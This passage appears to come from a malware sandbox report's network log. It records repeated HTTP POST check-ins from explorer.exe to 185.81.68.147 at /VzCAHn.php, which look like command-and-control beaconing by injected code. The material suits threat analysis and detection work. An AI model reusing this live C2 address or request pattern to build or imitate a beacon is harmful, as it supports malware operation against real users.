                                                                                                                                                                                                                                Dec 16, 2024 10:44:06.852617025 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:44:06.972628117 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:44:08.487099886 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:44:07 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                41192.168.2.1049939185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:44:08.710604906 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:44:08.830559969 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:44:10.340560913 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:44:09 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                42192.168.2.1049941185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:44:10.757055044 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:44:10.876784086 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:44:12.325468063 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:44:11 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                43192.168.2.1049946185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:44:12.554178953 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:44:12.674141884 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:44:14.161127090 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:44:13 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                44192.168.2.1049952185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:44:14.397943020 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:44:14.518105030 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:44:16.025187016 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:44:15 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                45192.168.2.1049958185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:44:16.261149883 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:44:16.381238937 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:44:17.717252970 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:44:16 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                46192.168.2.1049959185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:44:17.949527025 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:44:18.069514990 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:44:19.543370962 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:44:18 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                47192.168.2.1049965185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:44:19.773061991 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:44:19.893203020 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:44:21.402214050 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:44:20 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                48192.168.2.1049971185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:44:21.632390976 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:44:21.752568960 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:44:23.235625982 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:44:22 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                49192.168.2.1049973185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:44:23.476073027 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:44:23.595896006 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:44:25.083667994 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:44:24 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                50192.168.2.1049978185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:44:25.321567059 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:44:25.441807985 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:44:26.935523987 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:44:25 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                51192.168.2.1049984185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:44:27.166503906 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:44:27.286344051 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:44:28.774173975 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:44:27 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                52192.168.2.1049990185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:44:29.007385015 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:44:29.127536058 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:44:30.638452053 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:44:29 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                53192.168.2.1049991185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:44:30.902812004 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:44:31.022902966 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:44:32.377547979 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:44:31 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                54192.168.2.1049997185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:44:32.602201939 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:44:32.726351976 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:44:34.298784018 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:44:33 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                55192.168.2.1050003185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:44:34.522813082 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:44:34.643224001 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:44:36.134424925 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:44:35 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                56192.168.2.1050008185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:44:36.394293070 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:44:36.514477015 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:44:37.992120028 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:44:37 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                57192.168.2.1050011185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:44:38.225749016 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:44:38.345653057 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:44:39.908277035 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:44:38 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                58192.168.2.1050016185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:44:40.150902033 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:44:40.271044970 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:44:41.746231079 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:44:40 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                59192.168.2.1050022185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:44:41.976172924 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:44:42.096056938 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:44:43.588996887 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:44:42 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                60192.168.2.1050028185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:44:43.819523096 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
